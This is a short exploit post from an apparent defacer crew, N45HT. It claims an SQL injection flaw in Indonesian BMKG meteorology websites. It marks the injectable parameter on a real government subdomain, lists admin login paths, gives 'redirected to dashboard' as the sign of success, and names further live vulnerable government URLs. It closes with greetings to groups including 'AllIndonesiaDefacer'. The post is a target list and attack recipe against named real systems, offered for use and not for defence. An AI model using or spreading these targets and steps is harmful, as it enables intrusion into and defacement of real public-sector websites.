[+]Exploit Title: Stasiun Metereologi BMKG SQL-Injection Vulnerability
[+]Author: ./Sn00py
[+]Team: N45HT
[+]Goolge Dork: N/A
[+]Tested on: Windows 10 pro
[+]Vendor: https://www.bmkg.go.id/
=======================================
[+]Proof Of Concept:
Dorking in google
[+]SQL Injection
http://samratulangi.sulut.bmkg.go.id/index.php?page=BacaPubIkl&IDBerita=569'<- Inject Here
[+]Admin Login
http://127.0.0.1/admin/login
http://127.0.0.1/login
http://127.0.0.1/administrator
[+]Vuln? You redirected to dashboard
[+]Vulnerable site
http://iklim.kalbar.bmkg.go.id/index.php?page=BacaPubIkl&IDBerita=1153
http://iklim.ntb.bmkg.go.id/index.php?page=Baca%20Berita&id=409
Greetz:Shinchan - ZEROONE-04 - ZakirDotID - RSFLT - N45HT - PacmanCorp - AllIndonesiaDefacer